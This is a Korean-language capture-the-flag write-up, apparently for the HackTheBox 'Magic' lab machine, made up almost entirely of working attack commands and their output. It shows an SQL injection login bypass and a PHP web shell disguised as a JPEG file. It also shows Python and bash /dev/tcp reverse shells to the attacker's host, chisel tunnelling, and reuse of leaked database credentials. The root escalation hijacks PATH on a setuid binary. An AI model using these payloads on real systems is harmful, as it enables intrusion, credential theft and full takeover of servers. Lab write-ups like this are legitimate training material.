Proof of Concept
10.129.3.114
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
80포트 웹서비스 접근 시 로그인 페이지 존재
로그인 페이지에서 SQL Injection 취약점인 존재하여 로그인 우회 가능
POST /login.php HTTP/1.1
Host: 10.129.3.114
Content-Length: 39
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.3.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.3.114/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=on3h7rbdlosr0tte8kk9pfh6j0
Connection: keep-alive
username=admin&password=1234'+or+'1'='1로그인 성공 시 /upload.php 페이지로 이동되며, JPG, JPEG, PNG 파일 업로드 가능
PHP 웹쉘에 JPEG 헤더 시그니처를 추가한 webshell.php.jpg 파일 생성
┌──(kali㉿kali)-[~/Magic]
└─$ echo -n -e '\xff\xd8\xff\xe0' > webshell.php.jpg
┌──(kali㉿kali)-[~/Magic]
└─$ echo -n '<?=`$_GET[0]`?>' >> webshell.php.jpg
┌──(kali㉿kali)-[~/Magic]
└─$ file webshell.php.jpg
webshell.php.jpg: JPEG image data
┌──(kali㉿kali)-[~/Magic]
└─$ cat webshell.php.jpg
���<?=`$_GET[0]`?>웹쉘 업로드 성공
POST /upload.php HTTP/1.1
Host: 10.129.3.114
Content-Length: 315
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.3.114
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6QmWDLfx3kwyQdD5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.3.114/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=on3h7rbdlosr0tte8kk9pfh6j0
Connection: keep-alive
------WebKitFormBoundary6QmWDLfx3kwyQdD5
Content-Disposition: form-data; name="image"; filename="webshell.php.jpg"
Content-Type: image/jpeg
ÿØÿà<?=`$_GET[0]`?>
------WebKitFormBoundary6QmWDLfx3kwyQdD5
Content-Disposition: form-data; name="submit"
Upload Image
------WebKitFormBoundary6QmWDLfx3kwyQdD5--웹쉘이 정상적으로 동작하는 것을 확인
┌──(kali㉿kali)-[~/Magic]
└─$ curl http://10.129.3.114/images/uploads/webshell.php.jpg?0=id
���uid=33(www-data) gid=33(www-data) groups=33(www-data)웹쉘에서 리버스쉘 연결 명령어 실행
export%20RHOST="10.10.14.221";export%20RPORT=4444;python%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn("sh")%27리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Magic]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.3.114] 58590
$Lateral Movement (auth as theseus)
/var/www/Magic/db.php5 파일에서 DB 계정 정보 발견
- theseus:iamkingtheseus
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}MySQL 명령어가 존재하지 않아 DB에 접속하기 위해서는 피벗팅 필요
www-data@ubuntu:/var/www/Magic$ mysql
mysql
Command 'mysql' not found, but can be installed with:
apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1
Ask your administrator to install one of them.chisel을 사용하여 포트포워딩 설정
- Kali Linux
┌──(kali㉿kali)-[~/Magic]
└─$ ./chisel server -p 8888 --reverse
2026/02/22 05:14:55 server: Reverse tunnelling enabled
2026/02/22 05:14:55 server: Fingerprint W19YSezXc+qOT4N4KMAPkePcItm6CtrMuRWx0bKe2PQ=
2026/02/22 05:14:55 server: Listening on http://0.0.0.0:8888
2026/02/22 05:15:36 server: session#1: tun: proxy#R:3306=>3306: Listening- Target Machine
www-data@ubuntu:/var/www/Magic/images/uploads$ ./chisel client 10.10.14.221:8888 R:3306:127.0.0.1:3306
R:3306:127.0.0.1:330614.221:8888
2026/02/22 02:15:35 client: Connecting to ws://10.10.14.221:8888
2026/02/22 02:15:37 client: Connected (Latency 202.556689ms)이전에 획득한 DB 계정을 사용하여 Kali Linux에서 MySQL 접속 성공
┌──(kali㉿kali)-[~/Magic]
└─$ mysql -h 127.0.0.1 -P 3306 -utheseus -piamkingtheseus
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 22
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>Database 열거
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Magic |
+--------------------+
2 rows in set (0.205 sec)Table 열거
MySQL [(none)]> use Magic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login |
+-----------------+
1 row in set (0.201 sec)login 테이블에서 비밀번호 발견
- admin:Th3s3usW4sK1ng
MySQL [Magic]> select * from login;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.204 sec)알아낸 비밀번호를 사용해서 theseus 사용자로 전환 성공
www-data@ubuntu:/var/www/Magic/images/uploads$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$Read user.txt
theseus@ubuntu:~$ cat user.txt
cat user.txt
58cd47744c5214b4762224379f18cf18
theseus@ubuntu:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:90:e7 brd ff:ff:ff:ff:ff:ff
inet 10.129.3.114/16 brd 10.129.255.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb0:90e7/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:90e7/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
SetUID가 설정된 파일 열거 결과 /bin/sysinfo 바이너리에 SetUID가 설정되어 있으며 users 그룹에 실행 권한이 있는 것을 발견
theseus@ubuntu:~/.config$ find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null
llnd / -perm -4000 -type f -exec ls -l {} \; 2>/dev/nul
<SNIP>
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan 8 2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/pingusers 그룹에 theseus 사용자가 속해 있음
theseus@ubuntu:~/.config$ cat /etc/group | grep users
cat /etc/group | grep users
users:x:100:theseusltrace로 /bin/sysinfo 바이너리 실행 추적 결과 popen을 사용하여 프로세스를 실행하는 것을 발견
theseus@ubuntu:~/.config$ ltrltrace sysinfo
ltrace sysinfo
_ZNSt8ios_base4InitC1Ev(0x55a14763b131, 0xffff, 0x7fff637689c8, 128) = 0
__cxa_atexit(0x7ff7d00e7a40, 0x55a14763b131, 0x55a14763b008, 6) = 0
setuid(0) = -1
setgid(0) = -1
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc(0x55a14763b020, 0x55a1474398f8, -160, 0) = 0x55a14763b020
_ZNSolsEPFRSoS_E(0x55a14763b020, 0x7ff7d0157870, 0x55a14763b020, 0x55a14743992d====================Hardware Info====================
) = 0x55a14763b020
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev(0x7fff63768890, 0x55a14743992e, 0, 2880) = 0x7fff637688a0
popen("lshw -short", "r") = 0x55a1486ed280
fgets(WARNING: you should run this program as super-user.
WARNING: output may be incomplete or inaccurate, you should run this program as super-user.
"H/W path Device Class "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x6974706972637365) = 0x7fff63768890
fgets("================================"..., 128, 0x55a1486ed280) = 0x7fff637687e0
--- SIGCHLD (Child exited) ---
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x3d3d3d3d3d3d3d3d) = 0x7fff63768890
fgets(" system "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x72657475706d6f43) = 0x7fff63768890
fgets("/0 bus "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x6f62726568746f4d) = 0x7fff63768890
fgets("/0/0 memory "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x6d206d6574737953) = 0x7fff63768890
<SNIP>/bin/sysinfo 바이너리 실행 과정에서 4개의 프로세스를 호출하며, 이때 lshw, fdisk, free를 경로 없이 호출하고 있음
- popen(“lshw -short”, “r”)
- popen(“fdisk -l”, “r”)
- popen(“cat /proc/cpuinfo”, “r”)
- popen(“free -h”, “r”)
/tmp 디렉토리에 리버스쉘 연결을 시도하는 쉘 스크립트 “free” 생성
theseus@ubuntu:/tmp$ cat free
cat free
#!/bin/bash
bash -c 'sh -i >& /dev/tcp/10.10.14.221/4444 0>&1'
theseus@ubuntu:/tmp$ chmod a+x free
chmod a+x free명령 실행 시 /tmp 디렉토리 내 바이너리가 먼저 실행되도록 PATH 설정
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATHsysinfo 실행
theseus@ubuntu:/tmp$ sysinfo
sysinfo
====================Hardware Info====================
H/W path Device Class Description
====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7763 64-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/1/2 memory 512KiB L2 cache
/0/1/3 memory 512KiB L2 cache
/0/2 processor AMD EPYC 7763 64-Core Processor
<SNIP>root 권한으로 리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Magic]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.3.114] 59908
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)Read root.txt
# cat root.txt
36da9bcd0001792fd38f60f7a63a0819
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:90:e7 brd ff:ff:ff:ff:ff:ff
inet 10.129.3.114/16 brd 10.129.255.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb0:90e7/64 scope global dynamic mngtmpaddr
valid_lft 86395sec preferred_lft 14395sec
inet6 fe80::250:56ff:feb0:90e7/64 scope link
valid_lft forever preferred_lft forever